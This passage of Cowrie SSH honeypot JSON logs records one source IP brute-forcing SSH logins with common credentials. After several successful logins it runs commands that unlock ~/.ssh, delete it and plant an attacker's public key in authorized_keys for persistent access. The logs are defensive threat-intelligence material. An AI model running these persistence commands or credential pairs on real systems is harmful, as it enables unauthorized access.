-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:29.709066Z","src_ip":"212.227.235.229","session":"c3aa18b9aafb"}
{"eventid":"cowrie.login.failed","username":"tester","password":"P@ssw0rd","message":"login attempt [tester/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-08T23:12:30.454778Z","src_ip":"212.227.235.229","session":"c3aa18b9aafb"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:31.705009Z","src_ip":"212.227.235.229","session":"c3aa18b9aafb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59078,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5ce0d640f25","protocol":"ssh","message":"New connection: 212.227.235.229:59078 (1.2.3.4:22) [session: c5ce0d640f25]","sensor":"my-vps","timestamp":"2025-09-08T23:12:32.320221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:32.321586Z","src_ip":"212.227.235.229","session":"c5ce0d640f25"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:32.632005Z","src_ip":"212.227.235.229","session":"c5ce0d640f25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60870,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc996b2cef0a","protocol":"ssh","message":"New connection: 212.227.235.229:60870 (1.2.3.4:22) [session: cc996b2cef0a]","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.009839Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.010818Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.108659Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.login.success","username":"root","password":"as123456","message":"login attempt [root/as123456] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.533972Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:12:33.792011Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.792732Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.793820Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.897117Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.login.failed","username":"testuser","password":"abc123","message":"login attempt [testuser/abc123] failed","sensor":"my-vps","timestamp":"2025-09-08T23:12:33.915307Z","src_ip":"212.227.235.229","session":"c5ce0d640f25"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:12:34.108188Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:12:34.108879Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:12:34.209220Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:34.210137Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60874,"dst_ip":"1.2.3.4","dst_port":22,"session":"9765b5f41446","protocol":"ssh","message":"New connection: 212.227.235.229:60874 (1.2.3.4:22) [session: 9765b5f41446]","sensor":"my-vps","timestamp":"2025-09-08T23:12:34.302713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:34.303658Z","src_ip":"212.227.235.229","session":"9765b5f41446"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:34.398318Z","src_ip":"212.227.235.229","session":"9765b5f41446"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:12:34.818816Z","src_ip":"212.227.235.229","session":"9765b5f41446"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:35.228177Z","src_ip":"212.227.235.229","session":"c5ce0d640f25"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:35.916877Z","src_ip":"212.227.235.229","session":"9765b5f41446"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43202,"dst_ip":"1.2.3.4","dst_port":22,"session":"506ab19764cf","protocol":"ssh","message":"New connection: 212.227.235.229:43202 (1.2.3.4:22) [session: 506ab19764cf]","sensor":"my-vps","timestamp":"2025-09-08T23:12:36.016805Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:36.017949Z","src_ip":"212.227.235.229","session":"506ab19764cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:36.118944Z","src_ip":"212.227.235.229","session":"506ab19764cf"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:12:36.564677Z","src_ip":"212.227.235.229","session":"506ab19764cf"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:36.667399Z","src_ip":"212.227.235.229","session":"506ab19764cf"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:36.668426Z","src_ip":"212.227.235.229","session":"cc996b2cef0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44128,"dst_ip":"1.2.3.4","dst_port":22,"session":"badd5f006312","protocol":"ssh","message":"New connection: 212.227.235.229:44128 (1.2.3.4:22) [session: badd5f006312]","sensor":"my-vps","timestamp":"2025-09-08T23:12:44.869977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:12:44.870794Z","src_ip":"212.227.235.229","session":"badd5f006312"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:12:45.011367Z","src_ip":"212.227.235.229","session":"badd5f006312"}
{"eventid":"cowrie.login.failed","username":"super","password":"0","message":"login attempt [super/0] failed","sensor":"my-vps","timestamp":"2025-09-08T23:12:45.596904Z","src_ip":"212.227.235.229","session":"badd5f006312"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:12:46.737419Z","src_ip":"212.227.235.229","session":"badd5f006312"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:04.354827Z","src_ip":"212.227.235.229","session":"34d2e453fab4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46588,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cb9ed5c4bfc","protocol":"ssh","message":"New connection: 212.227.235.229:46588 (1.2.3.4:22) [session: 1cb9ed5c4bfc]","sensor":"my-vps","timestamp":"2025-09-08T23:13:15.513365Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:15.544846Z","src_ip":"212.227.235.229","session":"1cb9ed5c4bfc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:15.774865Z","src_ip":"212.227.235.229","session":"1cb9ed5c4bfc"}
{"eventid":"cowrie.login.failed","username":"user","password":"Password","message":"login attempt [user/Password] failed","sensor":"my-vps","timestamp":"2025-09-08T23:13:16.779849Z","src_ip":"212.227.235.229","session":"1cb9ed5c4bfc"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:18.025296Z","src_ip":"212.227.235.229","session":"1cb9ed5c4bfc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52286,"dst_ip":"1.2.3.4","dst_port":22,"session":"027d4b97f7e9","protocol":"ssh","message":"New connection: 212.227.235.229:52286 (1.2.3.4:22) [session: 027d4b97f7e9]","sensor":"my-vps","timestamp":"2025-09-08T23:13:31.063699Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:31.064609Z","src_ip":"212.227.235.229","session":"027d4b97f7e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:31.165448Z","src_ip":"212.227.235.229","session":"027d4b97f7e9"}
{"eventid":"cowrie.login.failed","username":"steam","password":"12345678","message":"login attempt [steam/12345678] failed","sensor":"my-vps","timestamp":"2025-09-08T23:13:31.614785Z","src_ip":"212.227.235.229","session":"027d4b97f7e9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:32.732708Z","src_ip":"212.227.235.229","session":"027d4b97f7e9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33676,"dst_ip":"1.2.3.4","dst_port":22,"session":"44c1a4de8e75","protocol":"ssh","message":"New connection: 212.227.235.229:33676 (1.2.3.4:22) [session: 44c1a4de8e75]","sensor":"my-vps","timestamp":"2025-09-08T23:13:33.762761Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:13:33.763575Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:13:34.073083Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.login.success","username":"root","password":"format#12345","message":"login attempt [root/format#12345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:13:35.351602Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:13:36.047453Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:13:36.048513Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:13:36.049695Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:13:36.360697Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:13:37.042239Z","src_ip":"212.227.235.229","session":"44c1a4de8e75"}
